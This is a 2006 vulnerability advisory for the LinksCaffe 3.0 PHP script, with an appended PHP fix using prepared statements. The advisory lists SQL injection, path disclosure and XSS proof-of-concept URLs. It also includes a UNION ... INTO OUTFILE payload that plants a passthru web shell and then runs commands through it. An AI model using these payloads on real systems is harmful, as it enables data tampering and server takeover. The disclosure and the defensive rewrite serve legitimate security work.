LinksCaffe30.txt

Published: 26 Jul 2006 | Reported by: Simo64 | Type: packetstorm | Source: packetstormsecurity.com

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilities on http://gonafish.com/, Impact: data/system access, Discovered by: Simo64 - Moroccan Security Team

Code
`LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilities  
  
Product : LinksCaffe 3.0  
Website : http://gonafish.com/  
Impact : manipulation of data / system access  
Discovered by : Simo64 - Moroccan Security Team  
  
[+] SQL injection  
******************  
  
[1]Vulnerable code in line 223 in links.php  
  
code :   
  
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());  
  
The $offset and $limit variables are not sanitized before being used in the query, which allows SQL injection.  
  
Exploit :   
  
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]  
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]  
  
[2] Vulnerable code in line 516 in links.php  
  
code :   
  
if (!$newdays)  
{  
$newdays=$daysnew;  
}  
else  
{  
$newdays=$newdays;  
}  
  
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());  
  
Exploit :  
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]  
  
  
[3] Vulnerable code in line 516 in links.php  
  
code :  
  
if ($action=="deadlink")  
{  
........  
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());  
while($row = mysql_fetch_array($rime)) {  
extract($row);  
echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";  
echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>  
<input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";  
}  
  
The $link_id variable is not sanitized before being used in the query, which allows SQL injection.  
  
Exploit :  
  
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]  
  
[+] FullPath disclosure :  
  
PoC :   
  
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*  
  
Result :  
  
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540  
  
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549  
  
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554  
  
[+] Remote Command Execution  
*****************************  
  
If magic_quotes_gpc is OFF, injection (3) can be used to write a file into a writable folder.  
  
Exploit :  
  
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*  
  
Afterwards commands can be executed:  
  
http://localhost/linkscaffe/pipo.php?cmd=ls;id  
  
  
  
[+] Cross Site Scripting   
*************************  
  
The $tablewidth variable in counter.php is not sanitized before being echoed, which allows XSS.  
The $newdays variable in links.php is not sanitized before being echoed, which allows XSS.  
The $tableborder, $menucolor, $textcolor and $bodycolor variables in links.php are not sanitized before being echoed, which allows XSS.  
  
PoC :   
  
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+  
  
http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]  
  
  
  
Contact : [email protected]  
  
greetz to all friends !  
`
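As a defensive counterpart to the vulnerable queries quoted in the advisory, here are the line-223 and "deadlink" queries rebuilt in PHP with validated integer parameters and PDO prepared statements; this is example code written for this page, not LinksCaffe's own. The PDO connection, the selected column list and the 100-row page cap are assumptions.

```php
<?php
// Added example, not LinksCaffe's own code: the two links.php queries quoted
// in the advisory rebuilt with validated integers bound as parameters.
// Assumes a PDO connection with PDO::ATTR_EMULATE_PREPARES set to false.
// Accept only a non-negative integer; "-1 UNION SELECT ..." never reaches SQL.
function requireInt(array $params, string $name, int $default = 0): int
{
    if (!isset($params[$name]) || $params[$name] === '') {
        return $default;
    }
    $value = filter_var($params[$name], FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
    if ($value === false) {
        http_response_code(400);
        exit('invalid parameter: ' . htmlspecialchars($name));
    }
    return $value;
}
// Line-223 query: LIMIT operands bound as integers, page size capped at 100.
function listLinks(PDO $db, array $get): array
{
    $stmt = $db->prepare(
        'SELECT * FROM links WHERE link_val = :val AND cat_id = :cat
         ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT :offset, :limit'
    );
    $stmt->bindValue(':val', 'yes', PDO::PARAM_STR);
    $stmt->bindValue(':cat', requireInt($get, 'cat'), PDO::PARAM_INT);
    $stmt->bindValue(':offset', requireInt($get, 'offset'), PDO::PARAM_INT);
    $stmt->bindValue(':limit', min(requireInt($get, 'limit', 20), 100), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
// "deadlink" query: link_id bound as an integer, and every value is
// HTML-escaped on output, closing the reflected-HTML issue in the echo too.
function renderDeadLinkForm(PDO $db, array $get): string
{
    $stmt = $db->prepare('SELECT link_id, link_name, link_url, link_desc
                          FROM links WHERE link_id = :id');
    $stmt->bindValue(':id', requireInt($get, 'link_id'), PDO::PARAM_INT);
    $stmt->execute();
    $html = '';
    foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
        $r = array_map(fn($v) => htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8'), $row);
        $html .= "<li><a href='{$r['link_url']}' target='_blank'>{$r['link_name']}</a>"
              . "<br>{$r['link_desc']}</li>"
              . "<input type='hidden' name='link_id' value='{$r['link_id']}'>";
    }
    return $html;
}
```

Binding the LIMIT operands as PDO::PARAM_INT only works as intended when emulated prepares are disabled. Independently of the code fix, running the application under a MySQL account without the FILE privilege stops INTO OUTFILE from writing files, and turning display_errors off keeps the full-path warnings shown above out of HTTP responses.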
